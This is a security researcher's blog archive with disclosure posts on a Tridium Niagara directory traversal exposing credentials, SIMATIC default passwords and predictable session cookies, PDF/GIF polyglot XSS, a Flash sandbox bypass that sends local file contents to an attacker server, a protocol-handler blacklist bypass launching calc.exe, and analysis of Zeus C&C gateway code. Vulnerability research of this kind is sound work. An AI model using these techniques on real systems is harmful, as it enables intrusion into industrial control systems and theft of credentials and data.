Billy (BK) Rios – Thoughts on Security in an Uncivilized World

Tridium Niagara – Directory Traversal
Mon, 26 Nov 2012 12:30:50 +0000

In July of this year, I wrote about some of the frustrations I encountered when working with Tridium, trying to get them to fix various issues in their Niagara framework. The Niagara framework is the most prevalent Industrial Control System (ICS) framework in the world; it links together various ICS technologies and protocols. Looking at Eireann Leverett's research on Internet-accessible ICS, we see that Tridium Niagara is also the most prevalent ICS system reachable from the Internet. I didn't talk much about the details of the issues I reported to DHS, but considering the patch has been out for nearly six months, I figure now is a good time.

The initial issue I reported to Tridium was a directory traversal that allowed remote, authenticated users to access files outside of the webroot. "Authenticated" includes demo and low-privileged accounts. The directory traversal is very simple. Most web application security specialists know the classic "../../" style directory traversal; however, Tridium is a bit different. Tridium makes use of "ordinals" to enable various functionality within Niagara. For example, here is a URL for a Niagara deployment that uses the "station" ordinal:

The Niagara framework supports a large number of ordinals. One of these is the "file" ordinal, which is used to retrieve files from the Niagara framework server. The "file" ordinal is followed by the path and filename of a file located within the webroot of the Niagara framework server. The Niagara framework isn't susceptible to "../../" style traversal attacks; instead, it uses the "^" character to traverse directories. Knowing this, we can specify a "^" character immediately following the file ordinal to traverse outside of the webroot. There are several files just outside of the webroot, but one is particularly interesting: a file named "config.bog". The config.bog file is the configuration file for the entire Tridium Niagara deployment. It contains all the configuration settings, including the usernames and encrapted (yes, I said encrapted… not encrypted) passwords for all accounts enabled on the system. Knowing this, we have a simple, reliable form of privilege escalation for any Tridium Niagara device. The exploit is very simple:


When you make the request above, you'll download a compressed file. Unzip it and you'll find the clear-text config.bog for the Niagara server. Inside the config.bog, you'll see the entire, detailed configuration for the Tridium device, along with the usernames and passwords (protected with encraption). That's it; it's that simple. When I reported this issue to Tridium, I sent them a copy of the config.bog file from their marketing demo deployment.
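For illustration only, the shape of such a request can be sketched as follows. The hostname is a placeholder and the "/ord" path is an assumption on my part, not a confirmed Niagara endpoint:

```python
# Hypothetical sketch of the traversal described above. The host and the
# "/ord" path are placeholders, not details of a real deployment.
host = "niagara.example"
ordinal = "file:^config.bog"  # "^" after the file ordinal steps outside the webroot

url = f"http://{host}/ord?{ordinal}"
print(url)  # http://niagara.example/ord?file:^config.bog
```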

Let's ignore the fact that demo, default, and guest accounts are fairly common on these devices. In addition to the directory traversal, I also reported a weak session identifier issue and an insecure credential storage issue. The Tridium Niagara framework generates session ids that have about 9 bits of strength. This makes brute-force attacks completely feasible and allows a remote attacker to quickly gain access to an authenticated state. Once authenticated, they are free to use the directory traversal to escalate privileges to Administrator. If that weren't enough, the Niagara framework also stores a copy of the current username and password (base64'd) in the cookie, giving any XSS bug the potential to divulge the clear-text username and password.
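To put "9 bits of strength" in perspective, here is a small sketch. The id encoding is a made-up assumption; the point is simply the size of the search space:

```python
# With ~9 bits of entropy there are only 2**9 = 512 possible session ids,
# so an attacker can simply try every one of them.
SESSION_BITS = 9

def candidate_session_ids():
    """Enumerate the entire 9-bit session-id space (encoding is hypothetical)."""
    return [format(n, "03x") for n in range(2 ** SESSION_BITS)]

ids = candidate_session_ids()
print(len(ids))  # 512 candidates -- small enough to brute force in seconds
```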

There is a shining light to this story. When I first reported this issue to Tridium, the initial response was horrid. Six months after the initial report, Tridium's leadership attempted to pass these vulnerabilities off as "by design". Eventually, the folks at Honeywell (Tridium's parent company) found out about these issues and took over the response process. Three weeks later, they had a patch ready to go. Honeywell made the patch available to me a few days in advance of the release so I could take a look and verify the issues were fixed. They even gave me credentials to the new demo site so I could see the new features and security changes. It was encouraging to see an ICS vendor take such a stance toward security researchers; I hope other ICS vendors take note and follow suit. I'd like to personally thank Kevin Staggs for driving the renewed focus on security for Tridium Niagara; if you're a Tridium customer, you should thank Kevin too. If you are a Tridium customer, you can learn more about the patch here:


Content Smuggling
Thu, 11 Oct 2012 18:00:28 +0000

A few years ago, I discovered a peculiar design decision described in the PDF specification. This design flaw allows an attacker to conduct XSS attacks against some websites that would not normally have XSS vulnerabilities. I reported this issue to Adobe in late 2009. Apparently, there are some challenging back-compat issues which make changing this design difficult. Given it's been nearly three years since I first reported the issue and a fix from Adobe doesn't seem likely (Chrome has already fixed its internal PDF reader), I figured I should let the web application community know about the exposures. I don't expect "APT" or other 31337 $country "cyber liberation armies" to use this anytime soon, but it is interesting behavior and I hope web application security folks find it interesting. Hopefully some researcher who's smarter than me can take this to the next level. Oh, and I apologize in advance for the ugly PoCs!

If we take a look at section 3.4.1, “File Header” of Appendix H in the PDF specification, we see the following:

13. Acrobat viewers require only that the header appear somewhere within
the first 1024 bytes of the file.

Anyone who has read the PDF specification probably knows about this behavior; in fact, Julia Wolf mentioned it in her epic "OMG WTF PDF" talk at CCC in 2010. This peculiar design allows for the creation of a hybrid file that is both some arbitrary file type (such as GIF, PNG, DOC, etc.) and a PDF. We do this by cramming a PDF header after another file header. An example of this is shown in the screenshot below:


Hopefully, by now we've all realized that hosting user-controlled PDFs and serving them from a sensitive domain is dangerous from a web security perspective. However, with this quirky file header behavior, we have the ability to smuggle PDFs onto a website that only accepts "benign" file types. As an example, I've uploaded such a file to an appspot web application I created. The PoC shows that we can load a single file as both a GIF (or any other file type we want) and a PDF. Adobe PDF Reader needs to be set as your default PDF handler for the PoC to work.
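A rough sketch of building such a hybrid file follows. The GIF bytes are truncated and the PDF portion is a placeholder, not a valid document; the only point being demonstrated is the header placement:

```python
# Build a GIF/PDF hybrid: as long as "%PDF-" appears somewhere in the first
# 1024 bytes, Acrobat treats the file as a PDF, while the leading GIF header
# keeps naive upload filters happy.
gif_header = b"GIF89a" + b"\x00" * 100   # stand-in for a real GIF's opening bytes
pdf_part = b"%PDF-1.4\n% placeholder PDF body, not a valid document\n%%EOF\n"

polyglot = gif_header + pdf_part
assert polyglot.startswith(b"GIF89a")    # looks like a GIF to simple checks
assert polyglot.index(b"%PDF-") < 1024   # within Acrobat's 1KB header search

with open("hybrid.gif", "wb") as fh:
    fh.write(polyglot)
```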

The only difference in the two displays in the PoC above is the way we reference the file. In the case of the image, we simply use an IMG tag. When we want to force the browser to hand the file to the default PDF reader, we make use of the OBJECT tag and explicitly specify a content type to force the content to be handled by the default PDF reader. Of course, this technique can be generalized for other plugins.

<img src="" height=10 width=10></img>


<object data="" type="application/pdf" width="500" height="500"></object>

A PDF does not have by-design access to the DOM of the domain from which it is served. How, then, can we use a PDF to achieve XSS? Here is where the feature-rich Adobe PDF Reader comes into play. Once the PDF is loaded, we have a couple of different options to achieve XSS. First, we can redirect the PDF to a javascript URL. These redirections navigate the browser (not the PDF document) and result in true browser-based XSS on the victim domain. Luckily, Adobe considers redirection from a PDF to javascript URLs a bug and has eliminated the most obvious methods for achieving this. There is, however, another method which achieves essentially the same impact. We can use a built-in API to make network requests to and from the victim domain. These network requests will carry any cookies associated with the victim domain, giving the attacker access to authenticated resources.

The following link demonstrates how this issue would be used against a website. The domain (the attacker’s domain in this example) loads a smuggled GIF/PDF from (the victim domain in this example). Once the PDF is loaded, we make use of the built in XML APIs to retrieve a file /secret.txt from (the victim domain).

IE users will see a warning in the PDF reader. This is because IE actually downloads the PDF and opens a local copy :) You can verify the IE behavior by browsing to this PoC with Internet Explorer (Adobe PDF Reader must be set as the default reader).

Lastly, you can inject a PDF into a website if you already have XSS. This might be helpful in bypassing XSS filters or application filtering. This is accomplished by injecting a PDF into the vulnerable site using the OBJECT tag:

<object data="http://vulnerable-domain/xss.asp?vulnerable-param=<injected PDF HERE>" type="application/pdf" width="500" height="500"></object>

An example of how this could be done is given below (this PoC is best viewed in Firefox with Adobe PDF Reader, but the technique is possible in all browsers).

What's the impact? Well, I suspect there are plenty of Internet-facing websites that are vulnerable to this bug. Any web application that accepts uploads of "benign" file types and then serves those files back to the user could be affected. This also affects websites which rely on content-type headers to prevent XSS (by the way, this strategy doesn't work). See Phil Purviance's blog for tips on spotting (and exploiting) websites that use content-type to protect against XSS. This bug can also be used to exploit applications that use content-disposition headers to prevent XSS bugs. The most common attack surface here will likely be internal content portals. Pretty much every internal content portal used in the enterprise is vulnerable to this issue (think SharePoint).

You can test for this issue by trying to upload this file to a vulnerable web application. If you see the PDF header in the uploaded file AND the file is served from a sensitive domain (e.g. it has auth cookies), then the application is vulnerable.
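That check is easy to automate. A minimal sketch, with the response bodies simulated rather than fetched from a real upload endpoint:

```python
# Flag a served file as a potential smuggled PDF if the magic "%PDF-"
# appears within the first 1024 bytes, mirroring Acrobat's header search.
def looks_like_smuggled_pdf(body: bytes) -> bool:
    return b"%PDF-" in body[:1024]

benign = b"GIF89a" + b"\x00" * 64          # an ordinary GIF-like body
smuggled = b"GIF89a" + b"%PDF-1.4 ..."     # GIF header with a PDF header inside

print(looks_like_smuggled_pdf(benign))     # False
print(looks_like_smuggled_pdf(smuggled))   # True
```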

The proper defense for this is the usage of alternate domains for user supplied content (aka sandboxed domains). Sandboxed domains can be tricky to implement. Some of the most popular web applications on the web already make extensive use of sandbox domains, but the vast majority of web applications do not. Once again, internal content portals are in a hard spot as it’s more difficult to implement a sandboxed domain on an internal network. Sandboxed domains is a subject many “web application security specialists” understand poorly and probably deserves its own blog post. How to properly implementing a sandboxed domain is a great interview question for senior web application security roles because it tests design and implementation skills. It also requires a really solid understanding of browser/plugin same origin policy. I haven’t seen much written about sandboxed domains, but this blog post does a nice job of summing up some of the challenges of content hosting.

Happy hunting!


Tridium – An ICS Learning Moment…
Fri, 13 Jul 2012 00:07:25 +0000

We are happy to see Robert O'Harrow shining a light on the vulnerabilities associated with Industrial Control Systems (ICS). The ICS software community is light years behind modern software security. Sadly, we can honestly say that the security of iTunes is more robust than that of most ICS software. Terry and I plan on releasing some technical details about what we've found in the near future, but for now we wanted to talk about some of our experiences with this particular issue.

First, ICS-CERT has done a great job tracking this issue. It's been months since we first reported the issue to ICS-CERT, and following up with an unresponsive vendor is extremely frustrating. It was apparent that ICS-CERT was making every effort to follow up with Tridium, and they kept us well informed throughout the entire process. We especially want to thank those ICS-CERT analysts who kept us apprised of developments despite Tridium's lack of response and unwillingness to accept responsibility for the issue.

We are disappointed that it took so long for the public to become aware of this issue. According to the Washington Post article, Tridium became aware of this vulnerability "almost a year ago, when a Niagara customer that uses the software to manage Pentagon facilities turned up issues in an audit". We are disappointed that even after discovering critical, remotely exploitable vulnerabilities in Tridium software, our government chose to purchase and implement the software anyway. We are disappointed that our taxpayer money paid for the ignored security audit, paid for the acquisition, and paid for the implementation/deployment of known-vulnerable software. We'd like to challenge our nation's leadership to evaluate the failures in our current processes surrounding the acquisition of software that supports critical infrastructure and Industrial Control Systems.

At times, we felt like ICS-CERT had their hands tied. We realize that when you are working with vulnerabilities that could affect critical infrastructure, a delicate balance between disclosure and timely notification of affected organizations must be maintained. However, when a vendor is unresponsive or refuses to accept responsibility for an issue, ICS-CERT should have the authority to inform vulnerable customers in a timely manner. DHS and ICS-CERT work for us, the American people… they do not work for the PR departments of ICS companies. ICS-CERT should be able to take the appropriate actions to ensure that we're safe and that ICS customers have the right information to mitigate and control risk. The PR damage done to any individual company should never be part of this equation. If a vendor is unresponsive or unwilling to accept responsibility for a security issue, ICS-CERT should have the option of disclosing issues 45 days after initial notification from external researchers (this is consistent with CERT/CC's disclosure timelines). Of course, special circumstances require special handling, but we're sure the folks at ICS-CERT can make those determinations when needed.

Probably the most disappointing part of the whole ordeal is Tridium's eagerness to blame the customer. We've seen this from other ICS vendors as well. It should never be the customer's responsibility to compensate for poor design. Many ICS vendors expect customers to ensure their product is implemented securely, yet provide zero (or extremely vague) guidance on how to do so. In many cases, secure deployment is simply impossible due to the extremely poor security design. Notification, automatic patching, and secure implementation guidelines in the ICS world are light years behind modern software. We don't understand Tridium's claim that "The firm also is doing more to train customers about security" when the root cause of these issues is poor design and coding practices at Tridium itself. Maybe Tridium should invest in training their developers about security first…

If you would like to contact us about our experiences, please email us at: help – at –

Billy Rios @xssniper and Terry McCorkle @0psys

The Siemens SIMATIC Remote, Authentication Bypass (that doesn't exist)
Wed, 21 Dec 2011 01:22:40 +0000

I have been working with ICS-CERT and various vendors over the last year, finding and "responsibly" reporting nearly 1000 bugs… all for free and in my spare time. Overall, it's been a great experience. Most of the vendors have been great to work with, and ICS-CERT has done a great job managing all the bugs I've given them. In May of this year, I reported an authentication bypass for Siemens SIMATIC systems. These systems are used to manage Industrial Control Systems and critical infrastructure. I've been patiently waiting for a fix for the issue, which affects pretty much every Siemens SIMATIC customer. Today, I was forwarded the following from Siemens PR (Alex Machowetz) via a Reuters reporter who made an inquiry about the bugs we reported:

“I contacted our IT Security experts today who know Billy Rios…. They told me that there are no open issues regarding authentication bypass bugs at Siemens.”

For all the other vendors out there, please use this as a lesson on how NOT to treat security researchers who have been freely providing you security advice and have been quietly sitting for half a year on remote authentication bypasses for your products.

Since Siemens has “no open issues regarding authentication bypass bugs”, I guess it’s OK to talk about the issues we reported in May. Either that or Siemens just blatantly lied to the press about the existence of security issues that could be used to damage critical infrastructure…. but Siemens wouldn’t lie… so I guess there is no authentication bypass.

These aren't the Auth Bypasses you're looking for

First, the default password for Siemens SIMATIC is "100". There are three different services exposed when Siemens SIMATIC is installed: Web, VNC, and Telnet. The default creds for the web interface are "Administrator:100", and the VNC service only requires that the user enter the password "100" (there is no username). This is likely the vector pr0f used to gain access to South Houston (but only he can say for sure). All the services maintain their credentials separately, so changing the default password for the web interface doesn't change the VNC password (and vice versa). I've found MANY of these services listening on the Internet… in fact, you can find a couple here:
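As a hypothetical sketch only (the web interface's exact auth scheme is an assumption here, and no endpoint is shown), checking for the default web credentials amounts to sending "Administrator:100":

```python
# Hypothetical sketch: build an HTTP Basic auth header for the default
# "Administrator:100" credentials. The Basic scheme is an assumption; the
# point is that the default password is a three-character constant.
import base64

def basic_auth(user: str, password: str) -> str:
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"

header = basic_auth("Administrator", "100")
print(header)
```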


But WAIT… there’s MORE! If a user changes their password to a new password that includes a special character, the password may automatically be reset to “100”. Yes, you read that correctly… if a user has any special characters in their password, it may be reset to “100”. You can read about these awesome design decisions (and many others) in the Siemens user manuals.

But WAIT… there’s MORE! So I took a look at what happens when an Administrator logs into the Web HMI. Upon a successful login, the web application returns a session cookie that looks something like this:


Looks pretty secure… right? Well, I harvested sessions from repeated, successful logins and this is what I saw:


Not so random huh…. If you decode these values, you’ll see something like this:

<STATIC VALUE>*administrator*11377468*17*
<STATIC VALUE>*administrator*11393468*18*
<STATIC VALUE>*administrator*11409484*19*
<STATIC VALUE>*administrator*11425484*20*
<STATIC VALUE>*administrator*11441500*21*
<STATIC VALUE>*administrator*11457500*22*
<STATIC VALUE>*administrator*11473515*23*
<STATIC VALUE>*administrator*11489515*24*

Totally predictable. For those non-techies reading this… what can someone do with this non-existent bug? They can use it to gain remote access to a SIMATIC HMI, which runs various control systems and critical infrastructure around the world… aka they can take over a control system without knowing the username or password. No need to worry though, as there are "no open issues regarding authentication bypass bugs at Siemens."
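The structure above makes forging the next session value mechanical. A sketch, with the static prefix stubbed out and the roughly 16,000-unit tick delta read directly off the sampled values:

```python
# The decoded cookie is "<static>*<user>*<tick>*<seq>*": the tick advances by
# roughly 16,000 between logins and the sequence number increments by one,
# so any observed value lets an attacker predict the next one.
def predict_next(token: str, tick_delta: int = 16000) -> str:
    static, user, tick, seq, _ = token.split("*")
    return f"{static}*{user}*{int(tick) + tick_delta}*{int(seq) + 1}*"

observed = "STATIC*administrator*11489515*24*"   # static prefix stubbed out
print(predict_next(observed))  # STATIC*administrator*11505515*25*
```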

Next time, Siemens should think twice before lying to the press about security bugs that could affect critical infrastructure… To everyone else, Merry Christmas!


Turning the Tables – Part II
Fri, 10 Jun 2011 22:44:06 +0000

I'm posting some of the research I've been working on over the last few months. I planned on submitting some of this research to the Blackhat/DEFCON CFP, but it looks like I'll be tied up for most of the summer and won't be able to make it out to Vegas for BH or DEFCON this year (pour some out and "make it rain" for me). The gist of the research is this: I've collected a number of malware C&C software packages, set up those C&Cs in a virtual network, and audited the applications and source code (when available) for bugs. The results were surprising; most of the C&C software audited has pretty crappy security.

This week’s sample is an auth bypass and SQL injection on a BlackEnergy C&C page. The first of the samples can be found here:

I’ll post more samples in the coming weeks.

Attacking malware C&C is an interesting proposition. Exploiting a single host can result in the transfer of hundreds or even thousands of hosts from one individual to another. I'm not the first to note that malware and C&C software is evolving. Gone are the days of simple IRC bots receiving clear-text commands from an IRC server. Today's C&Cs are full-fledged, feature-rich applications with much complexity. Complexity is the enemy of security, and even malware authors cannot escape this. There is no magic bullet; even malware authors face the difficulties of writing secure code. This is especially so if their customers are paying money for C&C software and demand new features and robust interfaces. Today's malware landscape looks much like a typical software enterprise, with paying customers, regularly scheduled feature updates, marketing, and a sprinkling of PR. Who knows, maybe in the near future these malware enterprises will have dedicated, on-call security engineering teams and a formal SDL process :)

Bypassing Flash's local-with-filesystem Sandbox
Tue, 04 Jan 2011 11:00:19 +0000

A few weeks ago, I posted a description of a set of bugs that could be chained together to do "bad things". In the PoC I provided, a SWF file reads an arbitrary file from the victim's local file system and passes the stolen content to an attacker's server.

One of the readers (PZ) had a question about the SWF local-with-filesystem sandbox, which should prevent SWFs loaded from the local file system from passing data to remote systems. Looking at the documentation for the sandbox, we see the following:

Local file describes any file that is referenced by using the file: protocol or a Universal Naming Convention (UNC) path. Local SWF files are placed into one of four local sandboxes:

The local-with-filesystem sandbox—For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.

First, I think the documentation here is a bit too generous. SWFs loaded from the local file system do face some restrictions. The most relevant are probably:

  1. The SWF cannot make a call to JavaScript (or VBScript), either through a URL or ExternalInterface.
  2. The SWF cannot make an HTTP or HTTPS request.
  3. Querystring parameters (e.g. blah.php?querystring=qs-value) are stripped and will not be passed (even for requests to local files).

Unfortunately, these restrictions are not the same as "cannot communicate with the network in any way", which is what the documentation states. The simplest way to bypass the local-with-filesystem sandbox is to make a file:// request to a remote server. For example, after loading content from the local file system, an attacker can pass the contents to the attacker's server via getURL() and a URL like: file://\\\stolen-data-here\

Fortunately, it seems you can only pass IPs and hostnames for systems on the local network (RFC 1918 addresses). If an attacker wants to send data to a remote server on the Internet, we'll have to resort to a couple of other tricks. A while back, I put up a post on the dangers of blacklisting protocol handlers. It's basically impossible to create a list of "bad" protocol handlers in situations like this. In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of protocol handler blacklists. If we can find a protocol handler that hasn't been blacklisted by Adobe and allows for network communication, we win.

There are a large number of protocol handlers that meet these criteria, but we'll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it's easy to bypass the Flash sandbox:

getURL('mhtml:', '');

Some other benefits of using the mhtml protocol handler:

  1. The request goes over http/https and ports 80/443, so it will get past most egress filtering.
  2. If the request results in a 404, it will fail silently. The data will still be transmitted to the attacker's server, but the victim will never see an indication of the transfer.
  3. The protocol handler is available by default on Win7 and will launch with no protocol handler warning.

There you go: an easy way to bypass Flash's local-with-filesystem sandbox. Two lessons here. One, running untrusted code (whether it's an executable, JavaScript, or even a SWF) is dangerous. Two, protocol handler blacklists are bad. Hope this helps, PZ!

Expanding the Attack Surface
Wed, 22 Dec 2010 20:11:55 +0000

Imagine there is an unpatched Internet Explorer vuln in the wild. While the vendor scrambles to dev/test/QA and prime the release for hundreds of millions of users (I've been there… it takes time), some organizations may choose to adjust their defensive posture by suggesting things like, "Use an alternate browser until a patch is made available".

So, your users happily use Firefox for browsing the Internet, thinking they are safe from any IE 0dayz… after all, IE vulnerabilities only affect IE, right? Unfortunately, the situation isn't that simple. In some cases, it is possible to control seemingly unrelated applications on the user's machine through the browser. As an example (I hesitate to call this a bug, although I did report the behavior to various vendors), we can use various browser plugins to jump from Firefox to Internet Explorer and have Internet Explorer open an arbitrary webpage.

  1. Requirements:  Firefox, Internet Explorer, and Adobe PDF Reader (v9 or X)
  2. Set the default browser to Internet Explorer (common in many enterprises)
  3. Open Firefox and browse to the following PDF in Firefox:

Firefox will call Adobe Reader to render the PDF, Adobe Reader will then call the default browser and pass it a URL, the default browser (IE) will render the webpage passed by the PDF.

The example I provide simply jumps from Firefox to IE and loads, however I'm free to load any webpage in IE. To be fair, we can substitute Safari or Opera for Firefox and it will still work.

Achieving this is simple.  We use a built-in Adobe Reader API called app.launchURL().  Looking at the documentation for the launchURL() API, we see that launchURL() takes two parameters: cURL (required) and bNewFrame (optional).  cURL is a string that specifies the URL to be launched and bNewFrame provides an indication as to whether cURL should be launched in a “new window of the browser application”.  In this case, “new window of the browser application” really means the default browser.

A simple one-liner in Adobe Reader JavaScript gets it done:


Happy hunting…

Will it Blend?
Fri, 17 Dec 2010 10:26:10 +0000

I had the honor of presenting at RuxCon and BayThreat this year. Both were great conferences with great people. I'm always humbled when I learn what others are doing in the security community, and even more humbled when asked to present. I gave a presentation called "Will It Blend?". The title of the talk is based on a series of videos from Blendtec (I could watch these videos all day). The content of the talk, however, is about "blended threats". During the talk I presented a set of bugs I discovered in various browser plug-ins. Independently, these bugs are pretty lame. However, if we chain them together, we get something that's actually pretty interesting. If you're interested in taking a look at the slides, you can find them here (PPTPLEX format) or on the RuxCon/BayThreat websites. The vuln chaining is a little difficult to visualize from the slides alone, so at the end of my talk I gave a live demo of the bugs being chained together. For those who were unable to attend the talk live, I've created a video to help explain how the exploit would be pulled off. It will help to go over the slides first, then watch the video.

Most of the relevant code is available in the slide deck (it's really simple). There are around five different bugs in play here, involving a variety of vendors. All the vendors involved have been contacted. The oldest bug here is over a year old; the youngest is about five months old. Kudos to Adobe: Adobe X has changed its caching behavior, so this specific attack cannot be used against Adobe X users.

I'm not sure where the blame lies for fixing these issues. On one hand, if a single vendor addresses their portion of the attack, the entire chain of vulnerabilities is broken. On the other hand, if only one vendor addresses their issue, all we have to do is find some other software/plugin that buys us the same capability and it's game on again.

I hope someone finds the presentation useful.  Happy hunting.

PDF RCE et al. (CVE-2010-3625, CVE-2010-0191, CVE-2010-0045)
Mon, 18 Oct 2010 18:00:25 +0000

A few weeks ago, Adobe released an advisory for a ton of Acrobat Reader bugs. Buried in the long list was a patch for a vulnerability I reported to Adobe. Taking a look at the entry in the advisory, we see the following description:


This update resolves a prefix protocol handler vulnerability that could lead to code execution

What's interesting is that many months ago (in April 2010), Adobe released a similar patch for a different bug I had reported to them. The description from April's advisory is as follows:


This update resolves a prefix protocol handler vulnerability that could lead to code execution

Going back even further, there is an Apple advisory that has a bug with a description similar to the Adobe advisories:


Description: An issue in Safari’s handling of external URL schemes may cause a local file to be opened in response to a URL encountered on a web page. Visiting a maliciously crafted website may lead to arbitrary code execution.

I'll walk you through the latest PDF bug, but the symptoms of all these bugs are very similar. As you know, PDF Reader supports the use of JavaScript. One of the JavaScript APIs supported by Acrobat Reader (>7.0) is app.launchURL(). app.launchURL() takes two parameters: the URL to be opened and a flag that specifies whether the URL should be opened in a new window. Typical usage of app.launchURL() looks something like this:

app.launchURL("", false);

Simple enough. Naturally, when a string that looks like a URI is encountered, one of the first things to try is pointing the URI value at a file:// location and observing whether the local file is opened. In this case, access to file:// is blocked by Adobe Reader. Next up are arbitrary protocol handlers. Tests for mailto://, foo://, and bar:// all work; however, javascript:// seems to be blocked. This feels like a protocol handler blacklist. I think there was a South Park episode about using blacklists last year…

There is a simple way to bypass most protocol handler blacklists. This bypass was the key to CVE-2010-3625, CVE-2010-0191, and CVE-2010-0045. The trick is to simply prepend the "url:" prefix protocol handler to your URI. You can test this by opening Internet Explorer (IE8 on Win7) and typing "url:javascript:alert(1)". I must give credz where credz are due: I first learned of this prefix protocol handler when looking at the source code for HTMLer (which is a port of MangleMe).
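A toy illustration of why scheme blacklists fall to this prefix trick. This is not Adobe's actual filtering code, just a sketch of the general failure mode:

```python
# A naive blacklist extracts the scheme before the first ":" and rejects
# known-bad handlers. Prefixing "url:" changes the apparent scheme, so the
# filter passes the URI even though Windows resolves it to the inner handler.
BLACKLIST = {"javascript", "vbscript", "file"}

def naive_filter_allows(uri: str) -> bool:
    scheme = uri.split(":", 1)[0].strip().lower()
    return scheme not in BLACKLIST

print(naive_filter_allows("javascript:alert(1)"))      # False -- blocked
print(naive_filter_allows("url:javascript:alert(1)"))  # True  -- bypassed
```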

With the prefix protocol handler in hand, we’re all set to bypass the protocol handler blacklist:

app.launchURL("url:file://c:/windows/system32/calc.exe", true);

There is some weird shell behavior here (which I won’t get into), but the key pieces are (as far as this bug is concerned):  the url: prefix protocol handler and setting the “New Window” flag to true.  A link to a simple PoC is provided below.  This bug worked on Win7 with no prompts.  For some users, this bug will not work if IE is already running (must be launched from a browser other than IE).  For users without Adobe’s April patch, this bug should work on all browsers in most configurations.

There you go, a simple yet effective way to bypass a protocol handler blacklist.  I hope that knowledge of this prefix protocol handler provides that missing piece you needed.  Happy hunting.

Turning the Tables – Part I Mon, 27 Sep 2010 11:00:55 +0000 Boom… I’ve just taken over a Zeus C&C.  I fire up a second, clean VM just to verify… yup it works.  Ok, now what?

A while back, I came across a kit for setting up a Zeus botnet.  It was an interesting package.  Looking at the C&C, the bot builder, the actual bot, and the user manual was pretty cool (yes, it comes with a user manual).  You have to admire some of the tricks used by the bot; these guys are clever.  I set up a mini-botnet on a testing network and began to examine how the botnet worked.  Eventually, I came across some bugs (even a blind squirrel finds a nut every once in a while).  There are some fascinating things to consider when finding bugs in software that is used primarily by criminals, but I won’t bore you with that now.  Instead I’d like to share with you some of the more interesting parts of my research.

Before I proceed, there are a few things I’d like to state:

  1. This research was done on my own time on my own equipment.  The thoughts on my blog are my own.
  2. Disclosure of this issue is a bit tricky.  I’ll cover some of the issues I came across in a future post.
  3. I’m releasing the details of my work because I felt it was important for the public to have this knowledge to better defend their networks.
  4. All the work presented here is for academic and research purposes only.

In the spirit of responsible disclosure I contacted and informed them that I may have discovered a security issue with their C&C server software.  The team informed me that they were a cloud service provider and didn’t have C&C software. then proceeded to spam me with advertisements for their latest products.  I then contacted but received no response. then proceeded to spam me with Viagra ads and executables for me to download.  With no other alternative and an email inbox full of spam, I have no choice but to provide full disclosure of the vulnerability to the public.

Taking a look at the documentation that accompanies the Zeus package, I see the change log indicates that I’m working with a recent version of Zeus (likely released earlier this year).

Examining the source code from the C&C confirms that I’m working with version, which was released on January 15th of this year.

I haven’t tested this exploit against newer versions of the C&C, but this post should provide everything you need to check yourself.  If you do happen to have a newer version of the C&C code (or kits from other botnets), please contact me (xssniper  -at- gmail) I’d love to have a look.  I looked on the Internetz to see if someone else had discovered this, but I found nothing.  If this bug was previously disclosed and I failed to credit you, please let me know (I don’t follow the bot scene very closely).

The C&C software has a PHP based web application that provides a control panel for botmasters and also serves as a gateway for bot communication.  There are several websites that have described the C&C so I won’t spend much time on that here, but I do feel it’s important to touch on a few things.  When the C&C web application is installed, very little attack surface is exposed to unauthenticated users.  The two most interesting pages available to unauthenticated users are the login page and the gateway.  By default, the login page is located at /cp.php.  By default, the gateway is located at /gate.php.  Some botmasters rename the gate.php file, however if you’ve managed to capture a live Zeus bot it will phone home to a php file.  The php file that the bot phones home to is the gateway (gate.php).  For clarity, let’s assume the gateway is at /gate.php (the default).  The gateway will only respond to requests from bots.  For example, if you point your browser to /gate.php, you’ll get a blank page back:

Luckily, we have both bot samples and the source for the C&C, allowing us to reverse the protocol needed for communication to the gateway.  Let’s walk through a couple key pieces of the gate.php source.  First, the gateway requires a POST request.

if(@$_SERVER['REQUEST_METHOD'] !== 'POST')die();

If the gateway receives a POST request, it grabs the POST body, performs some basic validation, and then decrypts the data using the RC4 algorithm.

$data      = @file_get_contents('php://input');
$data_size = @strlen($data);

if($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)die();

$data = RC4($data, BOTNET_CRYPTKEY);

This is not a typical POST request with POST parameters in the body.  Instead, this POST request contains a binary blob as its POST body (there are no POST parameter names).  The last line in the code snippet provided above mentions RC4 and a PHP constant named BOTNET_CRYPTKEY.  In case you’re wondering, the RC4 key (BOTNET_CRYPTKEY) is set by the botmaster when setting up the C&C and is stored server side (in the /system/config.php file).  As RC4 is a symmetric algorithm, the bot must also have a representation of the key.  The key is embedded into the bot (supplied via configuration file).  So once you have captured a live bot, you’ll be able to extract the RC4 key.  The key can be extracted from memory or if you are able to decrypt the config.bin file, you’ll see the key passed as part of the configuration for the bot.  If you’re interested in doing this, check out  Worst case, you can try brute forcing the key.
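
If you want to play along without a crypto library, RC4 is short enough to write out by hand.  Here is a minimal Python sketch of the cipher the bot applies to the POST body (the key and plaintext below are placeholders, not real Zeus values):

```python
def rc4(data: bytes, key: bytes) -> bytes:
    """Plain RC4: key-scheduling (KSA) followed by the keystream
    generator (PRGA). Encryption and decryption are the same
    operation, just like the C&C's RC4() call."""
    # KSA: permute the state array under the key
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # PRGA: XOR each data byte with the next keystream byte
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

key = b"botnet_cryptkey"        # placeholder for BOTNET_CRYPTKEY
body = rc4(b"fake bot report", key)
print(rc4(body, key))           # b'fake bot report'
```

Because the cipher is symmetric, running it twice with the same key round-trips the data, which is exactly why having the bot’s key is enough to both read and forge gateway traffic.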

Once the data is decrypted, the gateway does a quick sanity check.

if(strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0)die();

and proceeds to unpack the data if the sanity check turns out ok

$list = array();

for($i = HEADER_SIZE; $i < $data_size;)
{
